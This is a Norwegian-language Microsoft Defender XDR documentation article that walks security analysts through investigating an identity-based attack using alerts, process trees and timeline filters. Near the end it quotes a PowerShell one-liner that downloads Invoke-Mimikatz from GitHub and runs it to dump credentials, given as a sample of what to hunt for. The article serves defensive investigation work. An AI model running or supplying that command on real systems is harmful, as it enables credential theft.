Del via

Eksempel på et identitetsbasert angrep

  • Artikkel

Gjelder for:

  • Microsoft Defender XDR

Microsoft Defender for identitet kan bidra til å oppdage skadelige forsøk på å kompromittere identiteter i organisasjonen. Fordi Defender for Identity integreres med Microsoft Defender XDR, kan sikkerhetsanalytikere ha innsyn i trusler som kommer inn fra Defender for Identity, for eksempel mistenkte netlogon-rettighetshevingsforsøk.

Analysere angrepet i Microsoft Defender for identitet

Microsoft Defender XDR lar analytikere filtrere varsler etter gjenkjenningskilde på Varsler-fanen på hendelsessiden. I eksemplet nedenfor filtreres gjenkjenningskilden til Defender for identitet.

Filtrere gjenkjenningskilden i Microsoft Defender for identitet

Hvis du velger varselet mistenkt overpass-the-hash-angrep, går du til en side i Microsoft Defender for Cloud Apps som viser mer detaljert informasjon. Du kan alltid finne ut mer om et varsel eller angrep ved å velge Mer informasjon om denne varseltypen for å lese en beskrivelse av angreps- og utbedringsforslagene.

Et mistenkt overpass-the-hash-angrepsvarsel

Undersøker det samme angrepet i Microsoft Defender for endepunkt

En analytiker kan også bruke Defender for endepunkt til å lære mer om aktiviteten på et endepunkt. Velg hendelsen fra hendelseskøen, og velg deretter Varsler-fanen. Herfra kan de også identifisere gjenkjenningskilden. En gjenkjenningskilde merket som EDR står for Endpoint Detection and Response, som er Defender for Endpoint. Herfra velger analytikeren et varsel oppdaget av EDR.

En endepunktgjenkjenning og et svar i Microsoft Defender for endepunkt-portalen

Varselsiden viser ulike relevante opplysninger, for eksempel det berørte enhetsnavnet, brukernavnet, statusen for automatisk undersøkelse og varseldetaljene. Varselhistorien viser en visuell representasjon av prosesstreet. Prosesstreet er en hierarkisk representasjon av overordnede og underordnede prosesser knyttet til varselet.

Et varselprosesstre i Microsoft Defender for endepunkt

Hver prosess kan utvides for å vise flere detaljer. Detaljer som en analytiker kan se, er de faktiske kommandoene som ble angitt som en del av et skadelig skript, utgående IP-adresser for tilkobling og annen nyttig informasjon.

Prosessdetaljene i Microsoft Defender for endepunkt-portalen

Ved å velge Se på tidslinjen kan en analytiker drille ned enda lenger for å fastslå nøyaktig tidspunktet for kompromisset.

Microsoft Defender for endepunkt kan oppdage mange skadelige filer og skript. På grunn av mange legitime bruksområder for utgående tilkoblinger, PowerShell og kommandolinjeaktivitet, vil imidlertid noe aktivitet betraktes som godartet inntil det oppretter en ondsinnet fil eller aktivitet. Bruk av tidslinjen hjelper derfor analytikere med å sette varselet i sammenheng med den omkringliggende aktiviteten for å bestemme den opprinnelige kilden eller tidspunktet for angrepet som ellers skjules av felles filsystem og brukeraktivitet.

Hvis du vil bruke tidslinjen, starter en analytiker på tidspunktet for varslingsgjenkjenningen (i rødt) og blar bakover i tid for å finne ut når den opprinnelige aktiviteten som førte til den skadelige aktiviteten faktisk startet.

Analytikerens starttidspunkt for varslingsgjenkjenningen

Det er viktig å forstå og skille mellom vanlige aktiviteter som Windows Update tilkoblinger, aktiveringstrafikk for Windows-klarert programvare, andre vanlige tilkoblinger til Microsoft-nettsteder, tredjeparts Internett-aktivitet, Microsoft Endpoint-Configuration Manager aktivitet og annen godartet aktivitet fra mistenkelig aktivitet. Én måte å skille mellom er å bruke tidslinjefiltre. Det finnes mange filtre som kan utheve spesifikk aktivitet mens du filtrerer ut alt som analytikeren ikke ønsker å vise.

I bildet nedenfor filtrerte analytikeren for å vise bare nettverks- og prosesshendelser. Dette filterkriteriet gjør det mulig for analytikeren å se nettverkstilkoblingene og prosessene rundt hendelsen der Notisblokk etablerte en tilkobling med en IP-adresse, som vi også så i prosesstreet.

Slik ble Notisblokk brukt til å opprette en ondsinnet utgående tilkobling

I denne spesielle hendelsen ble Notisblokk brukt til å opprette en ondsinnet utgående tilkobling. Angripere bruker imidlertid ofte iexplorer.exe til å etablere tilkoblinger for å laste ned en skadelig nyttelast, fordi vanligvis iexplorer.exe prosesser anses som vanlig nettleseraktivitet.

Et annet element du kan se etter på tidslinjen, er PowerShell-bruksområder for utgående tilkoblinger. Analytikeren ser etter vellykkede PowerShell-tilkoblinger med kommandoer, for eksempel etterfulgt av en utgående tilkobling til et nettsted som IEX (New-Object Net.Webclient) er vert for en ondsinnet fil.

I eksemplet nedenfor ble PowerShell brukt til å laste ned og kjøre Mimikatz fra et nettsted:

IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1'); Invoke-Mimikatz -DumpCreds

En analytiker kan raskt søke etter nøkkelord ved å skrive inn nøkkelordet i søkefeltet for å vise bare hendelser som er opprettet med PowerShell.

Neste trinn:

Se phishing-undersøkelsesbanen .

Se også

Tips

Vil du lære mer? Kommuniser med Microsoft Sikkerhet-fellesskapet i det tekniske fellesskapet vårt: Microsoft Defender XDR Tech Community.